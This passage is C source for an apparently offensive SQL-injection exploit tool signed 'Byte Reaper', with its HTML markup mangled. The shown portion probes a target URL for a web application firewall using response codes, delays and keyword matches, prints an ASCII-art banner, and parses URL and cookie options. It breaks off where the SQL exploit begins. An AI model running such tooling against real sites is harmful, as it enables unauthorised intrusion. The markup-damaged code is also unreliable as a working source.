||<br \/>\n<br \/>            code == 404 ||<br \/>\n<br \/>            code == 503)<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Blocking response code: %ld\\e[0m\\n&#8221;, code);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Page is likely filtered by WAF.\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>            step2 = 1;<br \/>\n<br \/>        }<br \/>\n<br \/>        else<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] No blocking HTTP code.\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] WAF not detected based on HTTP code.\\e[0m\\n&#8221;);<br \/>\n<br \/>        }<\/p>\n<p>        printf(&#8220;[+] Step 3: Check Response Time\\e[0m\\n&#8221;);<br \/>\n<br \/>        if (timeD >= 3.0)<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Suspicious delay in response: %.2f sec\\e[0m\\n&#8221;, timeD);<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>            step3 = 1;<br \/>\n<br \/>        }<br \/>\n<br \/>        else<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] Normal response time: %.2f sec\\e[0m\\n&#8221;, timeD);<br \/>\n<br \/>            printf(&#8220;\\e[1;31m[-] WAF not detected based on delay.\\e[0m\\n&#8221;);<br \/>\n<br \/>        }<br \/>\n<br \/>        printf(&#8220;[+] Step 4: Check Response Content\\e[0m\\n&#8221;);<br \/>\n<br \/>        for (int l = 0; l < numberWaf; l++)\n<br \/>        {<br \/>\n<br \/>            if (response.buffer)<br \/>\n<br \/>            {<br \/>\n<br \/>                if (strstr(response.buffer, keyWaf[l]))<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>                    printf(&#8220;\\e[1;34m[+] Word Found : %s\\e[0m\\n&#8221;,keyWaf[l]);<br \/>\n<br \/>                    printf(&#8220;\\e[1;34m[+] Waf Detected (Word Found In Response)\\e[0m\\n&#8221;);<br \/>\n<br \/>                    printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                    step4 = 1;<br \/>\n<br \/>                }<br \/>\n<br \/>                else<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] Word Not Found  : %s\\e[0m\\n&#8221;, keyWaf[l]);<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] WAF not detected (Not Found Word in response)\\e[0m\\n&#8221;);<br \/>\n<br \/>                }<br \/>\n<br \/>            }<br \/>\n<br \/>            else<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Response Buffer is NULL !\\n&#8221;);<br \/>\n<br \/>                printf(&#8220;\\e[1;35m[+] Step 5 : Check Response Server (NULL + Http Code 200)\\e[0m\\n&#8221;);<br \/>\n<br \/>                if (code == 200)<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>                    printf(&#8220;\\e[1;32m[+] Http Code : %ld\\n&#8221;, code);<br \/>\n<br \/>                    printf(&#8220;\\e[1;34m[+] Waf Detected (Response NULL And http Code 200)\\e[0m\\n&#8221;);<br \/>\n<br \/>                    if (verbose &#038;&#038; response.buffer)<br \/>\n<br \/>                    {<br \/>\n<br \/>                        printf(&#8220;\\e[1;35m[+] Response Server : ==========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                        printf(&#8220;%s\\e[0m\\n&#8221;, response.buffer);<br \/>\n<br \/>                    }<\/p>\n<p>                    printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                    step5 = 1;<\/p>\n<p>                }<br \/>\n<br \/>                else<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] Waf Not Detected (Http Code not 200 And buffer NULL)!\\e[0m\\n&#8221;);<br \/>\n<br \/>                }<\/p>\n<p>            }<\/p>\n<p>        }<\/p>\n<p>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;[!] curl_easy_perform() failed: %s\\e[0m\\n&#8221;, curl_easy_strerror(res));<br \/>\n<br \/>    }<\/p>\n<p>    printf(&#8220;\\e[1;35m[+] Step 6: Check Connection Reset\\e[0m\\n&#8221;);<br \/>\n<br \/>    if (res == CURLE_RECV_ERROR)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;34m[+] Connection reset detected (CURLE_RECV_ERROR)\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] No connection reset error.\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<\/p>\n<p>    curl_slist_free_all(headers);<br \/>\n<br \/>    curl_easy_cleanup(curl);<br \/>\n<br \/>    printf(&#8220;\\e[1;35m\\n[+] Result Status Waf : \\e[0m\\n&#8221;);<br \/>\n<br \/>    if (step1 || step2 || step3 || step4 || step5)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;36m[=] Final Verdict: WAF Detected \\e[0m\\n&#8221;);<br \/>\n<br \/>    }<br \/>\n<br \/>    else<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[=] Final Verdict: No WAF Detected !\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<br \/>\n<br \/>}<\/p>\n<p>int main(int argc,<br \/>\n<br \/>         const char **argv)<br \/>\n<br \/>{<br \/>\n<br \/>    printf<br \/>\n<br \/>    (<\/p>\n<p>        &#8220;\u28e6\u2803\u28ff\u28f6\u28f6\u28f6\u28f6\u28fe\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u2874\u28f2\u280b\u2881\u2874\u280b\u2801\u2800\u28e0\u2836\u280b\u2801\u2800\u28e0\u28b4\u2806\u2800\u28a0\u2806\u2800\u2880\u28e0\u289e\u2853\u2812\u2800\u2800\u2809\u2813\u2832\u28a4\u28c0\u2800\u2800\u2800\u2800\u2809\u28a7\u2840\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8221; \u2800\u28ff\u28ff\u28ff\u28ff\u28ff\u2807\u2800\u2800\u2800\u28c0\u2864\u281a\u2801\u287c\u28e3\u2874\u280b\u2800\u2800\u2880\u285e\u2801\u2800\u2800\u2880\u28e0\u28ff\u284b\u2800\u28e0\u28ff\u2834\u281a\u28c9\u28c9\u2809\u2809\u2809\u281b\u282d\u28df\u2812\u28a4\u28c0\u2808\u2819\u2826\u2884\u28c0\u2800\u2808\u28a3\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u2800\u28f8\u28ff\u28ff\u28ff\u28ff\u285f\u2800\u28f4\u281a\u2809\u2801\u2800\u2880\u287e\u281f\u2809\u2800\u2800\u28c0\u28f4\u285f\u2800\u2800\u28e0\u28d6\u28cb\u28b9\u28ff\u2881\u28fe\u28cf\u2820\u28a4\u28c0\u2840\u2809\u2819\u2806\u2800\u2800\u2800\u2808\u2833\u28a4\u2848\u2833\u28c4\u2800\u2800\u2809\u2819\u2836\u28cc\u28f3\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u2800\u28ff\u28ff\u28ff\u28ff\u287f\u2800\u2800\u2808\u281b\u28d2\u28d2\u287e\u280b\u2800\u2800\u2880\u28e4\u28fe\u28ab\u281f\u2800\u2800\u28f8\u2827\u28c4\u2818\u2833\u28af\u2849\u2808\u2809\u2813\u28c4\u2800\u2809\u283b\u28cd\u281b\u2832\u28c4\u2800\u2800\u2800\u2800\u2819\u28a6\u2848\u2813\u2884\u2800\u2800\u2800\u2800\u2819\u28b7\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u2878\u28ff\u28ff\u2879\u28bf\u28c3\u28c0\u2834\u280a\u2809\u28e0\u280e\u2800\u2800\u2880\u28f6\u28ff\u283e\u2875\u280b\u2800\u2800\u287c\u28e1\u2834\u28e6\u28c0\u28c0\u2800\u2809\u2832\u28c4\u2800\u2808\u28b3\u2840\u2800\u2800\u2831\u28c4\u2800\u2819\u2886\u2800\u2800\u2800\u2800\u2819\u28a6\u2840\u2831\u28c4\u2800\u2800\u2800\u2800\u2839\u28cc\u28d3\u28f6\u28b6\u2866\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28b3\u28ff\u28ff\u28ff\u28df\u281f\u2803\u2800\u28e0\u281e\u2801\u2800\u2800\u28e4\u281b\u281b\u2892\u28fe\u2881\u28f4\u28e4\u281e\u28b0\u2847\u28b8\u280b\u28bb\u2808\u28dd\u28a6\u2840\u2808\u2813\u2884\u2800\u2831\u2840\u2800\u2800\u2808\u2833\u2840\u2800\u2833\u28c4\u2800\u2800\u2800\u2800\u2819\u28a6\u2808\u2833\u2840\u2800\u2832\u28c4\u2808\u28bf\u2844\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28fc\u28ff\u28ff\u289f\u28e1\u2874\u28f9\u281f\u2881\u2800\u2880\u28e0\u281e\u2809\u28fd\u282f\u2809\u2889\u28fd\u28bf\u28f6\u28e4\u28b8\u2881\u283f\u2840\u28b8\u2847\u2898\u28a6\u28bb\u2873\u28c4\u2800\u2800\u2800\u2819\u28c6\u2800\u2800\u2800\u2819\u2886\u2800\u2818\u28a6\u2840\u2800\u2800\u2800\u2800\u2801\u2800\u2800\u2800\u2800\u2828\u2835\u28f6\u2844\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u287f\u28f5\u28ff\u280b\u283a\u28a5\u28f4\u28ef\u281e\u284b\u2880\u28e4\u281e\u28f1\u28af\u28f4\u280f\u28a1\u284f\u2800\u28bf\u2838\u28b8\u2840\u2847\u2808\u28e7\u2808\u28be\u288f\u28a7\u2848\u2813\u28a6\u2840\u2800\u2819\u28a7\u28c0\u2800\u2800\u2808\u2833\u28c4\u2800\u28b3\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2810\u28ba\u28ef\u28fd\u28e6\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28fe\u28ff\u2845\u2800\u2800\u2800\u2838\u282f\u282f\u2856\u280b\u28f0\u28e3\u28a3\u28ff\u2803\u2880\u280f\u28a0\u2800\u28fe\u2800\u285e\u28e7\u2847\u2800\u28b8\u2844\u2818\u28de\u2887\u28cc\u2886\u2800\u28bb\u2873\u28c4\u2840\u2808\u2813\u2824\u28c4\u2800\u2808\u28a3\u28c0\u283b\u2840\u28a6\u2840\u2800\u2800\u2800\u2800\u2880\u28c0\u28f0\u28c6\u2809\u285d\u28e7\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28af\u28ff\u2819\u28a6\u2800\u2800\u2800\u2800\u28fc\u2881\u28fc\u2887\u288f\u287f\u2803\u2800\u287e\u2800\u284c\u2880\u284f\u28b0\u2847\u28ff\u28bf\u2847\u28b8\u283b\u2800\u28b8\u285e\u28ef\u285c\u28a6\u2800\u28b7\u2808\u28bb\u2873\u28a4\u2840\u2808\u2819\u2812\u2800\u2819\u28b3\u28c5\u2800\u2819\u28c4\u2800\u2800\u28b8\u28ff\u28ff\u28ff\u28ff\u28c6\u28b0\u28f8\u2844\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u284f\u28fc\u28ff\u2812\u2812\u2824\u2824\u28a4\u28f8\u2803\u287c\u285b\u28b8\u28fc\u2847\u28a0\u28e0\u2801\u28b8\u2801\u28fc\u2847\u28b8\u2800\u287f\u28ff\u2847\u2838\u2800\u2800\u2800\u28bb\u2858\u28e7\u2818\u28c7\u2818\u2846\u2800\u2839\u28e6\u2848\u2813\u2826\u28c4\u2840\u2800\u2800\u2809\u2833\u28c4\u2808\u2887\u2800\u2810\u28bf\u28ff\u285b\u281f\u280b\u2800\u2847\u28e7\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28a0\u28ff\u28ff\u2800\u2800\u2800\u28e0\u287e\u287f\u28fc\u28e7\u2847\u2847\u28ff\u2800\u2800\u283b\u28c4\u2800\u2800\u2847\u2847\u2846\u2800\u28bb\u28ff\u2887\u28b6\u2840\u28a0\u2844\u2808\u287f\u2878\u2846\u28b8\u2800\u28a7\u2840\u2800\u28bb\u2819\u2886\u2800\u2800\u2809\u28b3\u2866\u28c4\u28c0\u28c8\u2819\u283e\u28c4\u2840\u2800\u2800\u28b0\u2800\u2800\u28a0\u2847\u28ff\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28f8\u28ff\u28ff\u28c4\u28e4\u28fe\u281f\u28a0\u2847\u284f\u28ff\u2847\u28e7\u28ff\u2800\u28c0\u2840\u2808\u28e7\u2800\u2847\u2847\u2847\u28b8\u28b8\u28ff\u28b8\u28fc\u28b7\u2840\u2839\u28c4\u2801\u28b3\u2841\u2800\u2847\u2888\u28a3\u2800\u2808\u2847\u2808\u28a7\u2840\u2800\u2800\u28b7\u2840\u28a2\u2808\u28b9\u285b\u2813\u2819\u281b\u2812\u2808\u2847\u2800\u2838\u2847\u28ff\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u281f\u28e9\u285e\u2801\u2800\u28b8\u28f7\u2800\u285f\u2847\u28b8\u280b\u283b\u28b7\u28dd\u28a6\u28ff\u28c6\u2800\u2847\u2847\u28b8\u28fe\u28ff\u28bc\u28ff\u28fc\u28f3\u2844\u28b9\u28e7\u2840\u2801\u2800\u2817\u28b8\u28b8\u2800\u2800\u2847\u2800\u2800\u28f7\u2840\u2800\u2800\u28f7\u2848\u2800\u2800\u28a7\u2898\u2840\u2800\u2880\u2800\u28b8\u2840\u2800\u28c7\u28ff\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u281b\u28e1\u28fe\u284f\u2800\u2800\u2800\u2800\u28ff\u2800\u2803\u28bb\u28fc\u2840\u28e0\u2844\u2819\u283f\u285f\u28b9\u2818\u28ff\u2801\u2800\u2800\u28ff\u2800\u28bb\u2808\u284f\u283b\u2844\u28bf\u28b3\u2840\u2800\u2880\u285f\u2838\u2847\u2800\u28b8\u2800\u2800\u28b8\u28f7\u2840\u2800\u28b3\u2833\u2840\u2800\u2838\u284e\u2847\u2800\u2838\u2847\u2800\u28b7\u2800\u28b9\u2807\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28f4\u28ff\u28ff\u2847\u2800\u2800\u2800\u2800\u2838\u28c6\u2800\u2818\u287f\u28ff\u28ff\u28c5\u2840\u2880\u281f\u2838\u2800\u28bb\u2865\u2800\u2800\u28ff\u2844\u28b8\u28c6\u28f1\u28c0\u2819\u28e6\u28af\u28b3\u2800\u28f8\u28a7\u2847\u28ff\u2800\u2838\u2800\u2800\u28f8\u28c7\u28b3\u2800\u2818\u2887\u28b9\u2840\u2800\u28c7\u2803\u2800\u2800\u2847\u2800\u284c\u28b7\u2848\u28c6\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u2847\u2800\u2800\u2800\u2800\u2800\u2839\u28c4\u28a0\u28ff\u28ff\u281f\u280b\u28f5\u280f\u2800\u2800\u2800\u2838\u2847\u2808\u2819\u285f\u281b\u28ba\u2877\u28f6\u28ef\u28ed\u28c8\u28ff\u285f\u2847\u285f\u287c\u2847\u28ff\u2800\u2847\u2800\u2880\u28ff\u285e\u281a\u2840\u28fc\u2818\u2806\u28c7\u2800\u28b8\u2800\u2800\u2880\u2847\u2800\u2801\u2880\u2877\u28dc\u28c4\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u2807\u2800\u2800\u2800\u2800\u2800\u2800\u2818\u28ba\u284f\u28bf\u28e4\u281e\u2801\u2800\u2800\u2800\u2800\u2800\u28f7\u2800\u2800\u2800\u2800\u2838\u2847\u2800\u28b3\u2808\u2819\u283b\u28bf\u28ff\u2880\u28e7\u2847\u28ff\u28f0\u2803\u2880\u28fe\u28ff\u28f5\u2800\u28e0\u280f\u2847\u2800\u28ff\u2800\u284e\u28a0\u28e0\u28fc\u2847\u2800\u28b8\u28bf\u2847\u2818\u283b\u28c4\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u2812\u2812\u2812\u2812\u2812\u2812\u2812\u2800\u28b8\u2847\u2800\u28a7\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2801\u28f4\u2808\u2803\u2800\u2800\u28f8\u280f\u28fc\u2878\u285f\u28f3\u2803\u2880\u285e\u28cf\u288b\u28fc\u285f\u2801\u2800\u2847\u28a0\u280f\u28f8\u28f1\u28fe\u28df\u287f\u2861\u2880\u287f\u287f\u2847\u2800\u2800\u2808  \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u284f\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2818\u28c7\u2800\u2800\u28b9\u2866\u2824\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u285f\u2800\u2800\u2800\u28f0\u280f\u2800\u2883\u28a7\u2877\u2803\u28e0\u280f\u2800\u2809\u287e\u28b9\u28bb\u2800\u2876\u2823\u280e\u2880\u28fe\u28fb\u283f\u28f8\u281b\u28a1\u285e\u28fc\u2801\u2831\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u287f\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28b9\u2800\u2800\u2808\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28a0\u28fe\u28ff\u2847\u2800\u2800\u2816\u2801\u2800\u2800\u281e\u285e\u2881\u28f4\u2825\u2816\u281b\u28bf\u28b7\u28fe\u287e\u2846\u28ff\u28f6\u28cb\u28fe\u28ff\u28cf\u2800\u28b9\u287e\u280b\u28b0\u2801\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28c1\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u28c7\u2830\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2838\u28ff\u287f\u2801\u2800\u2800\u2800\u2800\u2800\u2880\u28fc\u28f5\u285e\u2801\u2880\u2854\u2800\u28ff\u28c1\u28fc\u2805\u28e7\u2801\u2818\u28ff\u287c\u280b\u28b8\u2846\u2800\u28b7\u28b8\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u284f\u2808\u2809\u2832\u28c4\u2840\u2800\u2800\u2880\u28c0\u28e4\u28f6\u28ff\u28ff\u2800\u2888\u2819\u2836\u28a6\u28c0\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u2874\u280b\u2801\u28b8\u2803\u2889\u287f\u2800\u2800\u28b8\u28fd\u2803\u2800\u2839\u28c4\u28fc\u2837\u2803\u2800\u2800\u28b3\u2800\u2818\u28ef\u28a7\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28e4\u28e4\u28e4\u28e4\u28e4\u28fd\u28f7\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2847\u2800\u2819\u2832\u28e4\u2808\u2819\u2832\u28e4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28f4\u28ec\u28e4\u2824\u2816\u281a\u281b\u2809\u2800\u2800\u2800\u2800\u28ff\u2800\u2800\u2800\u28ff\u2801\u2800\u2800\u2800\u2880\u28fc\u2803\u28b0\u284f\u2800\u2801\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u2874\u281e\u2809\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28c0\u287c\u2801\u2800\u2800\u28fc\u2819\u2802\u2800\u28c0\u2876\u280b\u2880\u28e0\u281e\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n &#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28f4\u280b\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28e0\u2834\u281a\u2809\u2800\u2800\u2880\u2874\u2801\u2800\u28e0\u281e\u2881\u28f4\u28be\u28ef\u28c4\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e4\u28c0\u28c0\u28c0\u28c0\u28c0\u28c0\u28c0\u2860\u28a4\u281e\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u2824\u281e\u280b\u2881\u28c0\u28e0\u2824\u2834\u281a\u2809\u28c0\u28e0\u281c\u2881\u2874\u28ff\u28e7\u28f8\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28f6\u28f6\u28e6\u28e4\u28c4 \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2809\u283b\u28c5\u2800\u2800\u2800\u2800\u285e\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u2816\u280b\u2801\u2800\u2812\u280a\u2809\u2801\u2800\u2800\u2800\u2880\u28c0\u28ed\u28e4\u2856\u288b\u28fc\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u2840\u2808\u2813\u2826\u28c4\u28f8\u2801\u2800\u2800\u2800\u2800\u2800\u2808\u2800\u2800\u2800\u2800\u2800\u2800\u28c0\u2864\u2834\u28ba\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2880\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28c4\u2800\u2800\u2800\u28bb\u28c0\u28c0\u2864\u2834\u2836\u2836\u2836\u2836\u2826\u28a4\u28e4\u2816\u280b\u2801\u2800\u28f0\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f \\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e4\u28c0\u285e\u2809\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u28f7\u2880\u28f4\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u280b\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2800\u2800\u2800\u2800\u28c0\u2864\u2834\u2836\u2836\u2836\u28a4\u28c0\u28fc\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u280b\u2800\u2800\u2800\\n&#8221;<br \/>\n<br \/>        &#8220;\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u28c0\u2874\u280b\u2801\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u28bf\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u280b\u2800\u2800\u2800\u2800\u2800\\n&#8221;<\/p>\n<p>    );<br \/>\n<br \/>    const char *name = &#8220;\\e[1;37m\\t\\t\\t[ Byte Reaper ]\\e[0m\\n&#8221;;<br \/>\n<br \/>    int s = 0;<br \/>\n<br \/>    while (name[s] != &#8216;\\0&#8217;)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;%c&#8221;, name[s]);<br \/>\n<br \/>        fflush(stdout);<br \/>\n<br \/>        usleep(100000);<br \/>\n<br \/>        s++;<br \/>\n<br \/>    }<\/p>\n<p>    printf(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n&#8221;);<br \/>\n<br \/>    struct argparse_option options[] =<br \/>\n<br \/>    {<br \/>\n<br \/>        OPT_HELP(),<br \/>\n<br \/>        OPT_STRING(&#8216;u&#8217;,<br \/>\n<br \/>                   &#8220;url&#8221;,<br \/>\n<br \/>                   &#038;yourUrl,<br \/>\n<br \/>                   &#8220;Target Url (Base URL)&#8221;),<br \/>\n<br \/>        OPT_STRING(&#8216;c&#8217;,<br \/>\n<br \/>                   &#8220;cookies&#8221;,<br \/>\n<br \/>                   &#038;cookies,<br \/>\n<br \/>                   &#8220;cookies File&#8221;),<br \/>\n<br \/>        OPT_BOOLEAN(&#8216;v&#8217;,<br \/>\n<br \/>                    &#8220;verbose&#8221;,<br \/>\n<br \/>                    &#038;verbose,<br \/>\n<br \/>                    &#8220;Verbose Mode&#8221;),<br \/>\n<br \/>        OPT_END(),<br \/>\n<br \/>    };<br \/>\n<br \/>    struct argparse argparse;<br \/>\n<br \/>    argparse_init(&#038;argparse,<br \/>\n<br \/>                  options,<br \/>\n<br \/>                  NULL,<br \/>\n<br \/>                  0);<\/p>\n<p>    argparse_parse(&#038;argparse,<br \/>\n<br \/>                   argc,<br \/>\n<br \/>                   argv);<br \/>\n<br \/>    if (!yourUrl)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Please Enter Your Url !\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Ex : .\/exploit -u http:\/\/URL\\\\e[0mn&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Exit Syscall\\e[0m\\n&#8221;);<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    }<br \/>\n<br \/>    checkWaf(yourUrl);<br \/>\n<br \/>    printf(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\e[0m\\n\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;[+] Start Exploit Sql&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>    if (cookies)<br 